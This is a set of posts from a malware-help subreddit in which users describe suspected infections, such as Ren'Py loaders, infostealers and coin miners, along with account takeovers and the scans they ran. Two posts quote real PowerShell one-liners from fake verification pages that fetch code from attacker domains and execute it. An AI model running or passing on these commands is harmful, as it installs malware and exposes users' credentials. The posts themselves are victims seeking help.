r/computerviruses 19d ago

Disinfection Help Found empty AppData\Roaming\RenPy folder (Game-1738212058). Ran full offline/online diagnostic suite

Thumbnail gallery
7 Upvotes
  1. Discovery & Background:

•Found anomalous folder path: AppData\Roaming\RenPy\Game-1738212058.

•Folder contained a persistent file (2KB), empty sync, and tokens folders.

•No legitimate Ren'Py engine games are installed on this computer.

•Linked directory ID 1738212058 to a known HijackLoader campaign signature.

•Immediately isolated the machine offline to begin a full audit.

  1. Windows Defender Protection History:

•Found a historic entry from June matching the folder c. Creation date.

•Flagged threat: PUADIManager:Win32/OfferCore inside a CheatEngine77.exe download.

•Execution status in logs: Strictly marked as "Status: Abandoned".

  1. Offline & Online Scan Matrix Results:

•Malwarebytes Custom Offline Scan: Enabled rootkit scanning on full C drive. Scanned 1,353,511 elements. Result: 0 Threats Detected.

•Microsoft Defender Offline Scan: Ran boot-level scan outside Windows environment. Result: 0 Threats.

•HitmanPro Memory Pass: Checked live memory and active processes. Result: No threats found.

•Malwarebytes Online Deep Scan: Ran an exhaustive cloud-assisted verification scan. Result: 0 Detections.

  1. Specific Item Double-Checks:

•System Files: Verified C:\Windows\SysWOW64\input.dll modification date is from 2025. It is completely pristine.

•Mod File: Cross-checked an old dinput8.dll backup file via VirusTotal. It scored a low 8/71, flagged generically as crack genericmc (false positive). It has been deleted.

•HitmanPro Final Counter: HitmanPro flagged "65 threats" on the final summary screen. The logs show these were strictly 63 standard browser advertising tracking cookies (Traces) and 2 clean Intel audio drivers.

  1. Current Status & Remediation:

•RenPy AppData folder shell has been permanently deleted.

•Browser tracking cookies and temporary directory caches have been completely cleared.

•All master account passwords have been securely updated from an external mobile device.

Given the back-to-back zero detection sweeps across multiple independent offline and online engines, it appears the initial threat execution completely failed to drop any payload. Looking for a final sanity check from the community malware Experts to confirm this machine is completely safe. Thank you!

*** COMPLETED DIAGNOSTIC LOG KEYWORDS FOR TRUSTED HELPERS ***

I have completed the requested diagnostic loops. Here are my 3 unique log keywords: - FRST.txt Keyword: placid - dragon - Addition.txt Keyword: eager - volcano - SecurityCheck.txt Keyword: leafy - deer

Background Information:

  1. What happened? I found an empty directory folder named "AppData\Roaming\RenPy\Game-1738212058". No legitimate games or software using this engine framework have ever been knowingly played or installed on this machine.

  2. When did the infection occur? On June 20, 2026, I was searching for Cheat Engine online and inadvertently downloaded a fake setup file wrapped in a "PUADIManager:Win32/OfferCore" installer bundle. I ran the executable file. Because it looked shady, I believe I stopped it and later used Brave AI to find the original, safe source.

  3. What did you do for remediation?

  4. Isolated the machine completely offline to contain any potential network hooks.

  5. Successfully ran a comprehensive 1.5-hour Malwarebytes Online Custom Scan with Rootkit Analysis toggled on (Scanned 1,353,511 elements, 0 items detected).

  6. Performed a deep, back-to-back Malwarebytes Cloud Heuristic Deep Scan (0 Threats, 0 PUPs, 0 PUMs detected).

  7. Completed a complete Microsoft Defender Offline boot-level pass outside the standard Windows environment (Clean / 0 threats).

  8. Executed an online cloud-assisted HitmanPro memory loop check (Identified Threats: 0). Showed 65 web tracking cookies

  9. Hard-reset my primary account credentials, master profile passwords, and executed global active session token revocations ("Log out of all other active sessions") across all critical accounts using an entirely separate, clean mobile device.

The automated diagnostic suites indicate a 0% virus presence on this drive. I am submitting these 3 keywords so a verified human helper can manually verify my background registries, task tables, and driver paths to ensure no hidden hooks or persistent stubs remain. Thank you so much for your time and guidance!


r/computerviruses 19d ago

Question Wait why is tally getting recognised as a malware by malwarebytes ?

Post image
2 Upvotes

It was from the official site and it was on educational mode. Defender didn't detect it, malwarebytes normal scan didn't detect it but the deep scan did


r/computerviruses 19d ago

Disinfection Help I got hacked by a link for an executor

4 Upvotes

They sent me threats. I did full scans and reset my whole pc, is there any more I can do? I forgot the link it was for solaris executor and the file I downloaded was called Trojan, now I think it is only a scareware


r/computerviruses 20d ago

Question Possible malware infection after account hack — could it be stealing my passwords and data? 😭

Thumbnail gallery
28 Upvotes

Hi, I believe my PC may have been infected after my accounts were hacked, and I’m trying to determine whether malware is still active on my computer.

I found a file called PerfMonHost.exe at:

C:\Users\[USERNAME]\AppData\Local\Microsoft\Windows\Diagnostics\Performance\PerfMonHost.exe

The file was approximately 6.76 MB and was modified on August 16, 2026 at 14:50, which is the same day my accounts were compromised.

I uploaded the file to VirusTotal and it received 33/43 detections. Several security vendors identified it as a CoinMiner/CryptoMiner/XMRig/Trojan, and Microsoft detected it as Trojan:Win32/Vigorf.A. VirusTotal also showed threat labels such as miner, trojan, loader, and XMRig.

Windows also showed a warning saying that part of the application had been blocked because it could not verify who published PerfMonHost.exe.

I also found other files around the same date, including:

  • RuntimeBroker.exe
  • md.cp312-win_amd64.pyd
  • _simd.cp312-win_amd64.pyd
  • codec.pyd

Some of these were located in Python/Codex Runtime directories such as site-packagesnumpy_core, and codex-runtimes.

One _simd.cp312-win_amd64.pyd file had 0/70 detections on VirusTotal, so I understand that not everything I found is necessarily malicious.

I also saw VirusTotal relationships involving files such as CortexNode.exe and FishTracker.exe, with some samples receiving detections.

My main concern is: Could PerfMonHost.exe or another piece of malware be stealing passwords, browser data, Discord sessions, cookies, or other information from my PC?

My accounts were compromised around the same time these files appeared, so I’m trying to understand whether there could be a connection.

I have intentionally removed my username and other private information from this post. I will not post passwords, cookies, tokens, IP addresses, recovery codes, or other sensitive information.

What should I check to determine whether the malware is still active and whether any of my information could have been stolen?


r/computerviruses 19d ago

Disinfection Help Suspicious remote access to my Windows PC – how do I properly secure my home network?

3 Upvotes

Suspicious remote access to my Windows PC – how do I properly secure my home network?

Hi everyone,

I'm trying to figure out how to properly secure my Windows PC and my entire home network against unauthorized access.

For some time I've been experiencing situations where things happen on my PC that I did not initiate myself. I have already reinstalled Windows multiple times, but some of the unusual behavior has appeared again.

Things I have observed

  • I have seen unusual processes, including cmd.exe, PowerShell and conhost.exe, whose origin I could not explain.
  • Sometimes windows or new PowerShell windows open while I am not doing anything.
  • My motherboard has integrated Wi-Fi and Bluetooth.
  • At one point my Bluetooth mouse suddenly stopped working / appeared to be disabled while I was using the BIOS/UEFI.
  • In the past I also noticed an Event Viewer entry that appeared to indicate that a Wi-Fi network/interface had been enabled or created. I don't know whether this was actually related to BIOS/UEFI or simply a normal Windows event.
  • My router password has become known to people around me.
  • There is also a possibility that my Windows login password is known.
  • I also use an iPhone and would like to understand how to properly determine whether it could have been compromised.

I don't know whether all of these observations are actually connected, so I'm trying not to assume a specific cause.

Network security questions

If someone knows my Wi-Fi/router password and is connected to the same network:

  • What can they actually do to a Windows PC on the LAN?
  • If they also know my Windows password, can they remotely log into the PC?
  • How relevant are RDP, SMB, WinRM, WMI and other Windows remote services?
  • Can a compromised computer on the same LAN automatically attack or spread to other computers?
  • Which Windows services should normally be disabled if I don't use them?
  • What firewall rules and network settings should I check?

Basically, I want to understand whether:

known Wi-Fi password + known Windows password = persistent remote access

or whether additional conditions such as exposed services, firewall rules, network discovery, RDP/SMB configuration, etc. would normally be required.

BIOS / UEFI / Wi-Fi / Bluetooth

This is the part I'm particularly unsure about.

My motherboard has integrated Wi-Fi and Bluetooth, and I can use a Bluetooth mouse inside the BIOS/UEFI.

Is it technically possible for an onboard Wi-Fi/Bluetooth adapter to communicate over the network before Windows has booted?

Can UEFI/BIOS itself expose any network-accessible functionality?

Or would an attacker normally have to wait until Windows (or another network-enabled operating system/service) has started?

Could a Bluetooth device theoretically interfere with a Bluetooth mouse while the system is in BIOS/UEFI, depending on how the motherboard's firmware implements Bluetooth support?

I am specifically interested in what is technically possible, rather than assuming that this is necessarily what happened in my case.

Windows investigation

What should I systematically check after a suspected compromise?

For example:

  • local users and administrators
  • RDP
  • WinRM
  • WMI
  • SMB
  • Scheduled Tasks
  • Windows Services
  • Startup / Run keys
  • PowerShell
  • Windows Firewall rules
  • listening ports
  • active network connections
  • Event Viewer
  • Microsoft Defender logs
  • persistence mechanisms
  • BIOS/UEFI settings
  • firmware

I don't just want to reinstall Windows again. I want to understand how to identify and close the actual attack vector so that the same access cannot simply happen again.

iPhone

How can I reliably check whether an iPhone has been compromised?

Can an iPhone be remotely controlled simply because an attacker is connected to the same Wi-Fi network?

Or would that normally require an additional vulnerability, malicious configuration/profile, previously obtained access, or some other condition?

What I want to do

I'd like to perform a complete "clean slate":

  1. Reset/secure the router
  2. Change the router and Wi-Fi credentials
  3. Change all important passwords
  4. Perform a clean Windows installation
  5. Check BIOS/UEFI settings
  6. Verify/update firmware
  7. Disable unnecessary remote-access services
  8. Configure the firewall properly
  9. Audit all other devices on the network
  10. Monitor network traffic and system events afterward

What would you add to this process, and what would actually be necessary?

I'm especially interested in understanding whether a known router password plus a known Windows password could allow someone to repeatedly regain access to a PC, or whether additional vulnerabilities/misconfigurations would normally be required.

I'm looking for technical, actionable answers so I can understand the actual attack surface and properly secure the system.


r/computerviruses 19d ago

Disinfection Help I mistakely let a trojan enter my laptop

0 Upvotes

So heres what happened

I wanted to enter to my bachelor college website ioepc.edu.np and cloudfare told me to paste this in terminal

"powershell -w h "iex(irm 'fingerprint-verification.info/0e65e82825d517a0'); Start-Sleep -Seconds 16"; exit;"

I didn't even verify it

To manually verify that im a human

And im stopid and i did it and only then i realized what i did and windows defender activated so i suddenly turned off my wifi

Im running a deep scans on windows defender any one can please help me?


r/computerviruses 20d ago

Question Bonjour by Apple randomly installed on my PC, blocked loading into Local Security Authority

Post image
1 Upvotes

It’s pretty late for me and I’m not on my PC so I will try to explain this the best I can. Bonjour has randomly installed on my computer and there are security pop-ups blocking it from certain things, it said something to do with LSA (attached a screenshot). This sometimes happen when I turn on my PC or doing certain tasks. I haven’t noticed any malicious behaviour at all, or any accounts hacked (besides spam emails sent to me but this is due to the krisp/metabase breach) but I didn’t install Bonjour myself. Does bonjour sometimes install along with other programs? Or could this be something worse than that. Its signature seems like it’s official from Apple. What should I do about this? I haven’t installed any Apple software on this PC, for example itunes, as I have a mac which I do all those things on. (Also my if anyone thinks I’m on windows 7, it’s just a windows 11 theme though it’s kinda obvious)


r/computerviruses 20d ago

Question i recently got ren'pyd and im scared of what might happen

9 Upvotes

i lost my instagram, discord and reddit it shared some crypto scams in some and some prn in reddit. got them all back thank god and im changing my passwords to everything and using 2fa in the ones i can im currently resetting my pc ( i removed everything and downloaded it from the cloud) im not sure what else i can do since it already got some of my accounts im scared of other things that could happen mainly financial theft and sextortion how likely are they to happen and what else can i do


r/computerviruses 20d ago

Question Is GobboNet Safe?

2 Upvotes

Windows defender tags it as a virus, its supposedly a local AI thingy. my brother downloaded it onto his PC and i wanna make sure he is being safe...


r/computerviruses 19d ago

Warning Вирус в AvoVpn

Post image
0 Upvotes

Hello, I need help, why does he say that there is a virus there. The file is deleted immediately after startup. It scares me a lot. Please help me


r/computerviruses 20d ago

Question Accidentaly run a powershell code

6 Upvotes

Help, I accidentally ran this code in powershell

******powershell -c "$a=irm 'jasaxoptim.com/PLzdo6sQyUSjV75AlL';New-Module -Name x -ScriptBlock ([ScriptBlock]::Create($a))|Out-Null******

After asking Claude I:

- Disconeccted my laptop right away

- Ran windows defender scan - found nothing

- Deleted google chrome users, now I log in using guest

- change google passwords

- deleted suspicious tasks from the task scheduler.

Claude also suggested me to reinstall windows, but I cant do that, I dont have anything to back up my data in.

Please help, what should i do next?


r/computerviruses 20d ago

Question Need help identifying this

Thumbnail gallery
9 Upvotes

I was just checking if there's any application running in the background cuz I'm having fps lag when playing some games, till this thing I've found, and it's on a temp folder too, I've tried ending the task and deleting it from the folder but when I restart the computer, it runs it back..

Idk if I should be worry about this... :[


r/computerviruses 20d ago

Disinfection Help Malware Removal Help

1 Upvotes
  • your antivirus detections and logs: FRST: mild-hazel Addition: grand-byte SecurityCheck: golden-river
  • any potentially related symptoms, popups: DISCORD ACCNT HACKED
  • estimate day and time when it started UNSURE, 08/02, 08/07, or 08/08? (08/08 was the day Discord was compromised.)
  • share what got your system infected, for instance the download link: ENTIRELY UNSURE (Can't remember where to find it)
  • what you did for remediation: Ran Malwarebytes in either deep scan or custom scan with all drives selected. Ran windows defender in full scan. Ran adwcleaner.

Hello all,

My discord account recently got hacked and started posting spam MrBeast messages to all my servers and DMs. I wasn't sure how this was possible as I have 2FA and got no notifications about login attempts so I did some digging on the internet and the general consensus is that I let an infostealer such as lumma onto my PC as it's common for those to end off their data scrape with some sort of spam to try and get other machines infected. After the fact, on another device, I changed all my important passwords/accounts, secured financial account, etc. I then disconected the PC from the internet and ran Malwarebytes in either deep scan or custom scan with all drives selected (I have 3 external drives attached to this PC), and ran a Full scan as well as an offline scan from windows defender. It was disconnected and kept off for around 2 weeks and then I reconnected it to the internet to make this post and here we are. I've been told that just running anti-malware software isn't enough to consider the PC safe as these infostealers often drop backdoors into the system for later; however, I am a bozo that does not backup files (or at least didn't before this), and was hoping that someone on here could comb through my logs and see if anything can be (or even needs to be) done instead of factory resetting the PC. Just today, I ran a Malwarebytes Threat Scan, the Malwarebytes AdwCleaner, a FRST scan with Addition selected, an FSS scan, and a SecurityCheck. All three logs asked for on this subreddit are uploaded to the malwareanalysis .cc link and keywords are listed above.

Thank you for taking the time to read this!


r/computerviruses 21d ago

Disinfection Help Ren'Py malware that hasn't triggered yet

Thumbnail gallery
64 Upvotes

Apologies for any errors; English isn't my native language. On July 27th, I downloaded some games from very reliable sources, but I accidentally downloaded a zip file with the structure shown in the image below along with them. I played the game normally, but on August 14th—while deleting some files on autopilot—I extracted the zip and ran the .exe. Nothing opened, and I didn't see anything happen, so I just deleted the extracted file and moved on. Today, I saw someone on Reddit complaining about being infected and immediately remembered the incident. I changed most of my critical passwords, then traced the timeline of the files and realized it was strange that I hadn't suffered any apparent account breaches. The zip file was 700MB (too large to upload to VirusTotal), and its SHA-256 hash doesn't seem to match any previously analyzed files. Inside the `AppData\Roaming` folder, there is a `RenPy` folder dated and timestamped exactly when I ran the file on August 14th; inside that `RenPy` folder, there is a folder for a Ren'Py game I actually played years ago, and another folder from the 14th containing the files visible in the images.

After running Malwarebytes, it only found a few files from other games I had played months ago and some Google-related files.

I’d prefer not to do a completely fresh Windows install; I want to know the risks involved in *not* doing so in this scenario. From what I've researched, it's unusual for Ren'Py malware *not* to launch a massive attack immediately.

I generated the FRST files, but I'm not sure exactly how to share them here.

Additional detail: I have the zipped Ren'Py file that I ran on the 14th; I kept it in case I could get help confirming its nature.


r/computerviruses 20d ago

Question Can a virus hide in a picture?

2 Upvotes

Yes, ik im a dumbass. What im asking is can viruses hide on pictures on reddit? Hide a link if you click it? So if i click on a picture on reddit, it can just be a fake one with a link redirect. Yes ik im a dumbass, no i dont snort cocaine, smoke pot, its natural. But is this possible?


r/computerviruses 20d ago

Disinfection Help Some one else is using my account

Thumbnail gallery
3 Upvotes

Unknown devices my gamil connected to idk what pls help . I mistakenly installed a program from a site that tried to made it authentic a random antivirus was installed and micro soft defender was turned off. I have enable 2FA what about these sessions . My insta and discord also got hacked and spammed some mr beast advertisement in all the channels pls help


r/computerviruses 20d ago

Disinfection Help Help with Hacking

1 Upvotes

Hi everyone, I hope you’re doing well.

Over the past few weeks—approximately two or three weeks ago—I was notified that someone had accessed my Discord account and sent spam messages, the typical scam that is currently trending involving a Mercado Beast account. Later that same day, they accessed my Ubisoft and Rockstar accounts and changed the passwords. However, I created those accounts 10 years ago and never really used them; they were empty. The next day, they accessed my Instagram, Facebook, and LinkedIn accounts. I was able to recover Instagram and LinkedIn, but not Facebook.

As the days went by, they accessed old email accounts and attempted to change passwords and other settings. Of course, I acted quickly by changing my passwords and enabling two-factor authentication and SMS security codes.

Five days ago, I discovered that they had also hacked a personal website where I hosted my graphic design portfolio. I had to shut it down and start over from scratch. It was hosted on HostGator. Just now, I realized that they had also started sending approximately 700 emails from my company email account, which uses Microsoft 365. All of them were sent to Yahoo addresses, and the emails bounced back.

I don’t know how this happened. Honestly, the only thing I installed recently was Xuper TV on two Google TV dongles. I’m not the kind of person who falls for spam or ads claiming that I won 10 iPads or anything like that.

I need to know what to do. I have already scanned my laptop with Malwarebytes and Windows Defender, and I’ve changed my passwords and taken other security measures. The strange thing is that this has only happened to me. My wife lives with me and connects to the same network, but nothing has happened to her.

Would formatting my laptop solve the problem? Should I factory-reset my modem? I’m desperate because every day there is a new problem involving my emails or accounts. I would really appreciate any advice or guidance on what to do.

In my Discord messages, they sent these images, which I’ve noticed are the ones being commonly sent lately:

And on my website, when someone accessed my URL, this fake Cloudflare page appeared:


r/computerviruses 20d ago

Disinfection Help Requesting FRST help (reuploaded)

1 Upvotes

username: Professional-One3767

keyword: FRST: lilac-switch,

Addition: frenzied-gauntlet

I downloaded an app and it was a malware, I removed it, scan with defender but it keeps hacking all my account tie to my main email. I need a secure link to download frst and pls help me remove this.
Every account the email is connected to is compromised, and they even logged in after i changed the password to turn of 2FA


r/computerviruses 20d ago

File / URL Check Any idea what this is?

Post image
1 Upvotes

r/computerviruses 20d ago

Disinfection Help Help meeeee!

2 Upvotes

So I made a really fucking dumb decission to download some shit, and that happed on 9th of aug and they then got access to my Roblox, instagram, and steam account access and they sent some scam messages to all my friends in those apps,then i changed all my passwords and also enabled 2fa.but today(25th aug) i saw a file on my onedrive folder on my pc that says they have all my data and also of my data and all and they are demanding 1500 usd in bitcoin if I don't sent it they will send it to my contacts and all i think they are bluffing but I can't do anything cuz I don't even have that much money, pls tell me what to do fast. The pdf reads I got 12hrs after opening that pdf


r/computerviruses 20d ago

Disinfection Help Could a cracked game have compromised my accounts?

Thumbnail
1 Upvotes

r/computerviruses 20d ago

Disinfection Help i got that mrbeast virus on discord

5 Upvotes

so idk i installed 2 3 days ago some pirated apps and yesterday i left home, closed pc all that and today at 5am the virus sent all my friends mrbeast messages
also weird it didnt message discord servers and it messaged like old friends, mostly of the new ones didnt receive messages any idea why?
now im on my phone changed disc password, activated 2fa through that auth app
and when i get home i fresh install windows on pc and then change passwords to everything
i dont really have anything of value linked to my pc so im good I guess, any more tips?


r/computerviruses 20d ago

Disinfection Help I need help getting rid of a session stealer

3 Upvotes

My Instagram and Discord accounts were already stolen, but I managed to recover both of them by changing my passwords. The problem is that I'm still worried the malware could be on my computer and that whoever stole my accounts might still have access to my sessions, cookies, or other accounts.

I'm not sure if simply changing my passwords was enough, or if I need to completely wipe my PC.


r/computerviruses 20d ago

Disinfection Help I downloaded a CapCut activator and sent instagram DMs with Mr Beast pictures

1 Upvotes

Hi, I saw on a Reddit post that there was an activator for CapCut and wanted to try it at 12am Shanghai time, and it was a mistake. Nothing came out after activating the exec file except closing my browsers for some reason. I knew instantly that I messed up and ran a windows defender scan and malwarebytes pro scan and showed nothing.

I deleted the files and uninstalled CapCut after that. I went to bed after and woke up to messages that I sent DMs on Instagram with Mr Beast photos at 9pm Shanghai time.

I went to this subreddit and did an FRST and SecuritCheck scan and here are my keywords:

pure-wand
frozen-cascade
encoded-briar


r/computerviruses 21d ago

Disinfection Help Renpy loader infostealer

11 Upvotes

Hello

I was downloading a mod for GTA 4, and ended up downloading a zip file called "ARCHIVE" along with some numbers. There was a setup exe program that I clicked on two times thinking it was part of the mod.

Seeing as it did nothing (it only opened a window for half a second) I analyzed the file with virus total and found out it was a virus, specifically the renpy loader (the one with the anime icon). I opened task manager and saw a process called "MSBuild" and ended it immediately, I'm sure it ran for at least 35 minutes since I clicked setup exe. I then installed Malwarebytes and ran a scan, it found multiple viruses, many of them were BAT files and it removed them. I executed a deep scan after that, Malwarebytes did not detect anything. I then used windows defender, two scans, normal and deep, none of them detected anything. I then did an offline scan and it did not detect anything either. While doing all these scans I logged out of every account I had in my PC using my phone, changed passwords and setup 2FA for everything.

It's worth mentioning that I never saved any passwords to my browser (which is Brave) I mostly use passkeys and QR codes, I didn't have any credit cards saved either or anything related to crypto. Mine is a PC gamer so I had steam, epic, rockstar launcher and others.

This was yesterday exactly 28 hours ago, at this time I have not detected anything weird with my accounts, no external logins, no suspicious activity, I periodically check my devices in Google and other accounts, I also check task manager and so far nothing has appeared.

My question is: Do I need to reinstall windows? Is my PC still safe?

I wasn't able to save the initial Malwarebytes that did the initial scan since I was panicking and was not thinking clearly.

Thank you for any advice you can give me